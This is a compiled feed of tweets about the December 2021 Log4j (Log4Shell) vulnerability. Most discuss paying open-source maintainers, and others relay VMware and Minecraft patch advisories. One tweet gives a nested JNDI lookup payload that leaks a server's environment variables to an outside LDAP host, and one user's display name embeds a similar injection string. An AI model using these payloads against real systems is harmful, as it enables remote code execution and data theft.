Watching this log4j bug metastasize, I’m seeing people ask why industry doesn’t fund open source. I don’t have a great answer, but I have some thoughts following the experience with Heartbleed in ‘14. 1/

— Matthew Green (@matthew_d_green) December 11, 2021

I get about $2,000 a month from GitHub sponsors. Let’s talk about funding for open source projects, specifically my thoughts for @tldraw. https://t.co/1Fi5tzWsgZ

— Steve Ruiz (@steveruizok) December 12, 2021

This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.

— Marcus Hutchins (@MalwareTechBlog) December 10, 2021

Millions of $$$ are floating around bug bounties which do very little in fixing the underlying core issues we face.

Yet critical dependencies which are everywhere struggle in getting adequate backing, only hostility when they break.

Pay maintainers, pay proper security audits. https://t.co/VT7XJK7dJI

— Andrea Barisani (@AndreaBarisani) December 12, 2021

Okta RADIUS and MFA server are vulnerable and exploitable and need upgrading ASAP https://t.co/WvojrhBQRA pic.twitter.com/RZ7wJCbc7F

— Kevin Beaumont (@GossiTheDog) December 11, 2021

No one is paying the log4j2 maintainers!?

There is a whole page on the responsibilities of a @TheASF "Project Management Committee"... AND NO ONE IS PAYING THEM? https://t.co/JXimIQLxw5

Open Source needs to grow the hell up. Yesterday.https://t.co/tQpITt8vn3

— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) December 10, 2021

In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like
${jndi:ldap://${env:user}.xyz.collab.com/a}
Will leak server side env vars!

— Tanner Barnes (@_StaticFlow_) December 10, 2021

This is going to sound blunt, but it's a distribution problem not a funding problem. $ is easy.

Corporations have budget and are willing to spend, but it takes too much time. Finding projects that need help and maintainers willing to help in exchange for money is hard. pic.twitter.com/mFkOoOVYXn

— Dan Lorenc (@lorenc_dan) December 12, 2021

Interesting that "supply chain vulnerabilities" have become a crisis in both the physical world and the web (open source library dependencies) at the same time.

The perpetual pendulum between distributed and centralized will now swing back to the latterhttps://t.co/GnalKfmBrC

— Chris Anderson (@chr1sa) December 12, 2021

The Apache Log4j project is maintained by three people who are volunteering their spare time. Please don't be a jerk to them because multi-billion dollar companies are using their tool without even bothering to throw $1,000 their way. https://t.co/2pjh7FG7h4

— Catalin Cimpanu (@campuscodi) December 11, 2021

Great post — charity-based open source is very naive and unrealistic, if only because its 100x more complicated for a business to pay someone for nothing than it is for something.https://t.co/0YsYcMXifk pic.twitter.com/34r6ofYnNm

— Adam Wathan (@adamwathan) December 11, 2021

Log4j recap

- two random unpaid folk maintain the code
- a random requested the vuln/feature in 2013
- major IT and security vendors rely on that code
- problem was publicised by teens in Minecraft video game
- scope of problem still unclear days later pic.twitter.com/dK7RTNCV3b

— Kevin Beaumont (@GossiTheDog) December 12, 2021

I love when people share ideas like this, especially when they're backed by current events#opensource https://t.co/p1lTYIxJRd

— Joshua Powell (@joshuapowell_io) December 11, 2021

but the real answer is crypto... totally right problem to identify but invoicing companies for maintaining open source software is lol. https://t.co/UkniROBq6J

— sam lessin (@lessin) December 12, 2021

DAOs were literally born to solve this

Thinking of building a tool for DAOs to fund open source projects on @github and handle treasury through @juiceboxETH

Someone stop me (or join me) https://t.co/0PZ94tuk8N

— jjacopo.eth (@jj_ranalli) December 12, 2021

The world would be so much better off if maintaining open source software were a viable profession. One day…? https://t.co/b3tcTGiBIe

— R. Miles McCain (@MilesMcCain) December 11, 2021

Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. https://t.co/W2u6AcBUM8

— Volkan Yazıcı (@yazicivo) December 10, 2021

Open source maintainer as a career path. There are just a few companies who understand the benefits of funding open source development, and it’s challenging to keep explaining that to others. Luckily I was able to find some already. Thanks for that! https://t.co/PPIV0otdTj

— Jan Žák (@zakjan) December 12, 2021

Open source spent the 1990s trying to convince corporations they could trust it, the 2000s delighted at its success in corporations, the 2010s begging corporations to help pay for the enormous maintenance costs being shouldered by random individuals. https://t.co/UR0VugGK12

— Laurie Voss (@seldo) December 12, 2021

As a follow-up: @FiloSottile has a nice post about professionalizing the role of OSS maintainer. This is great! But I would still argue that money is finite, and knowing which projects need help is a basic missing ingredient. https://t.co/7IZadI4fy6

— Matthew Green (@matthew_d_green) December 11, 2021

This is well-intentioned but saying "companies are in the business of getting what they need—by paying invoices" show incredible naivety in how bad companies are at paying their invoiceshttps://t.co/vVVQb6zaJD

— Andrew White (@pixeltrix) December 11, 2021

Once again, an Open Source Software maintained by a few people on their spare time, used by a lot of companies on their projects, has a big vulnerability.
When companies will understand that it's on their interest to support financially OSS? https://t.co/DA6hJCvOND

— Romain Rastel ? (@lets4r) December 12, 2021

Controversial opinion: RedHat, AWS, GCP, GitHub, NPM, etc should pay F/OSS developers.https://t.co/AQ7t86o8bg

— ☣purely editorial☣ (@chromatic_x) December 11, 2021

Endorse all this. There are a ton of engineers, of all experience levels, who would jump at the chance to do this kind of work if they could make a stable career out of it. https://t.co/i8ANhX9IMn pic.twitter.com/70yfUUgIBG

— Matt Ficke (@mattficke) December 11, 2021

When Heartbleed dropped, it was very similar to log4j: an underfunded OSS project (OpenSSL) that nobody thought about, but was *everywhere*. It took everyone by surprise, and even woke industry up. The result was a surge of funding. 2/

— Matthew Green (@matthew_d_green) December 11, 2021

We all agree the status quo is unsustainable.

Here are 1,000 words on how we could get the role of Open Source maintainer to graduate to a real, properly paid profession.

The thing is, companies need it as much as maintainers do.https://t.co/RK26lKGg3h

— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) December 11, 2021

This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage.

"I work on Log4j in my spare time"
"always dreamed of working on open source full time"
"3 sponsors are funding @rgoers's work: Michael, Glenn, Matt"

People, what are we doing. pic.twitter.com/2hAxUWCjuC

— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) December 10, 2021

When people say "you didn’t build that" they’re not just talking about how highways and public education contribute to corporate success. They’re also talking about this. Open source is the vital foundation of nearly every corporate software asset. And it gets no respect. https://t.co/elRM7dgRac

— Love In The Time Of Covid (@JimJ_candid) December 11, 2021

Player safety is the top priority for us. Unfortunately, earlier today we identified a security vulnerability in Minecraft: Java Edition.

The issue is patched, but please follow these steps to secure your game client and/or servers. Please RT to amplify.https://t.co/4Ji8nsvpHf

— Minecraft (@Minecraft) December 10, 2021

This! I am thankful to all GitHub Sponsors and Patreons, but without my day2day job @ISCdotORG (which is thankfully also working on Open Source), I would be able to sustain my family. https://t.co/omf3ijiNJY

— Ondřej Surý ?? (@oerdnj) December 11, 2021

It takes lack of attention. In Heartbleed, someone merged a dumb feature quickly without doing careful code review.

In log4j someone merged a dumb feature that any security expert would have recoiled at.

— Matthew Green (@matthew_d_green) December 11, 2021

„This person's spare time passion project is responsible for half of the internet working the way it should. Vulnerable companies to this issue included Apple, Google, my cell phone carrier and everyone that uses JavaEE in its default configuration.“ https://t.co/ISp5UqJyPt

— Andreas Baumgartner (@bmgnrs) December 12, 2021

New blog post in which I touch upon the discourse regarding how open source maintainers can get paid.

I'll spare you my efforts to make my tweet more flashy, viral, have a strong hook, or whatever it is I'm supposed to do for metrics. https://t.co/qf2oZpdlkw

— Nadim Kobeissi (@kaepora) December 12, 2021

On Paying Open Source Maintainers
by @kaeporahttps://t.co/LTOiIwM4H4 #programminghttps://t.co/hlW2ktfpIU

— Lobsters (@lobsters) December 12, 2021

“It's a design failure of catastrophic proportions.”

Free Wortley, LunaSechttps://t.co/0b2mvbzt4t

— Follow Light within (@kevskewl) December 12, 2021

In case you’re worried seeing bits & pieces like this, here’s a civilian-level update on the …catastrophic? #log4j Java vulnerability: https://t.co/F6Lfgk8I0C https://t.co/9HWYketppZ

— LizNeeley (@LizNeeley) December 11, 2021

A Log4J Vulnerability Has Set the Internet 'On Fire' | WIRED https://t.co/MT0tcOz6F8

— Christian Reilly (@reillyusa) December 12, 2021

#tech #technology #IT #startup #startups #cloud #cloudsecurity #data #datascience #hacking #innovation #digitaltransformation #cyberattacks #ransomware #wfh #iot #fintech #security #logging #5g A Log4J Vulnerability Has Set the Internet 'On Fire' https://t.co/L6AS4vkVjL

— Anand Aggala (@aggala) December 12, 2021

? OMG, all that #Minecraft Servers being vulnerable to #log4j

?️ "Minecraft screenshots circulating on forums appear to show players exploiting the vulnerability from the Minecraft chat function."

? https://t.co/KB1cNVszzK#Log4Shell #log4jRCE #log4j2 #cybersecurity

— ? Mirko Ross ?? (@mirko_ross) December 12, 2021

A Log4J Vulnerability Has Set the Internet 'On Fire' https://t.co/oVGSS7ABwT #tech #feedly #CES2022 @AffinityInitia1 @jblefevre60 @kalydeoo @sallyeaves @BetaMoroney @DeepLearn007 @Xbond49 @Ym78200 @ipfconline1 @IanLJones98 @Hana_ElSayyed @AmitChampaneri1 @ravidugh @Khulood_Almani

— Nicolas Babin #CES2022 (@Nicochan33) December 11, 2021

Professional maintainers: a wake-up call https://t.co/q7UsXUWOty

— Bill Bennett (@billbennettnz) December 12, 2021

We all agree the status quo is unsustainable.

Here are 1,000 words on how we could get the role of Open Source maintainer to graduate to a real, properly paid profession.

The thing is, companies need it as much as maintainers do.https://t.co/RK26lKGg3h

— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) December 11, 2021

If you’re running VMware products in your environment, you are impacted by the Log4j vulnerability. Check out this KB for workarounds/mitigations for many VMware products: https://t.co/t01clQJLKO

— Sean Massey #blacklivesmatter (@seanpmassey) December 11, 2021

VMware Response to Apache Log4j Remote Code Execution Vulnerability
(CVE-2021-44228)https://t.co/OkgksLoQpW
Classification: Critical, Solution: Update, Exploit: Wild

— Sami Laiho (@samilaiho) December 12, 2021

Make sure to update to the latest @Runecast Analyzer (released today). It discovers the critical vulnerabilities described in VMSA-2021-0028 #vCenter #Horizon #NSX #security #log4j CVE-2021-44228 https://t.co/sngsxfirTG

— Stanimir Markov (@sferk) December 12, 2021

VMwareがとりあえずlog4jの脆弱性で32製品を更新 https://t.co/OEEhN4OCsK

追加するかもよ？ とリストの最後に書いてあるのが笑える :-)

— 高梨陣平 (@jingbay) December 11, 2021

VMware advisory, I couldn’t fit the products under investigation on one screenshot ? https://t.co/HvUJUUR2g8 pic.twitter.com/OIPXIYM1ru

— Kevin Beaumont (@GossiTheDog) December 11, 2021

何かすごいの出てる(語彙力)
Horizon, vCenter, vRealize Operationsなど諸々https://t.co/M1r4PuQ7fB

— つじ (@st_mouton) December 12, 2021

Workarounds and patches are available for multiple VMware products that are exploitable by the log4j2 issue — including vCenter, Horizon and the Unified Access Gateway.

Implement. Now. https://t.co/rogNxNgUIx

— Michael Stanclift (@vmstan) December 11, 2021

Perfect 10.0 security vulnerability found in most VMware products. Please spread the word to make everyone aware.

VMSA-2021-0028 - VMware Response to Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

Info: https://t.co/y3iiAOdhwq#vExpert #log4j #VMUG

— Russell Hamker (@butch7903) December 11, 2021

Log4j bug is like a domino ... https://t.co/Qz3o3RCQ0b

— ? Astr0 Baby (@astr0baby) December 11, 2021

The log4j mess exemplifies what I consider the core flaw in the open source ecosystem. People in the industry have now been conditioned to expect so many things for free, but also expect for themselves to get paid. It's hypocritical and unstable. https://t.co/WWf4h9B6VG pic.twitter.com/uWHqZMTOgG

— Billy Hollis (@billyhollis) December 12, 2021

How do you fix this problem? You introduce licensing that requires you to pay money when you build commercial tooling on top of OSS. It's actually a solved problem but despised by so many. https://t.co/cv0Gcc5q2Y

— Hadi Hariri (@hhariri) December 12, 2021

If you use software made by others in their spare time and find it useful, pay them. This should not be a controversial opinion. https://t.co/XDMFIcTlsW

— @mikko (@mikko) December 11, 2021

"Open Source" is Brokenhttps://t.co/vuyGH8szWt#rant

— Xe (@theprincessxena) December 11, 2021

that's why we need DAO, someone builded the internet, but he got nothinghttps://t.co/1Y22Ec0KOf

— Panda (@hellopandadao) December 12, 2021

Open source is broken?https://t.co/JfgTZrfOom pic.twitter.com/dMqGH82w19

— vishwesh.eth (@vishweshji) December 12, 2021

Minecraft公式より対策が発表されました。各バージョンの対策の行い方の詳細はこちらからご覧ください。https://t.co/CvSIziPrEP

— SaziumR (@SaziumR) December 11, 2021

PSA Time Folks:https://t.co/tgziGl5mWN

If you run a Minecraft server or the client (Java edition) then you need to read this and do some work. The recent log4j vulnerability is exploitable and will cause you pain.https://t.co/pmkqSYN4gZ

— Zed A. Shaw, Writer (@lzsthw) December 12, 2021

This is a very serious exploit! The Mojang team have done an amazing job at responding to the issue, and it is to the largest extent resolved. You can read up more about it here: https://t.co/82fcLeafbd

— Gegy (@gegy1000) December 11, 2021

Here's an informational page about the vulnerability and how to deal with it on both client and server side for all versions: https://t.co/GykKstyxgp

— slicedlime (@slicedlime) December 10, 2021

If your kids play Minecraft, make sure they upgrade to 1.18.1 because their box can get hacked with a chat message.https://t.co/MdlZvctfOe

— Heath Borders (@heathborders) December 11, 2021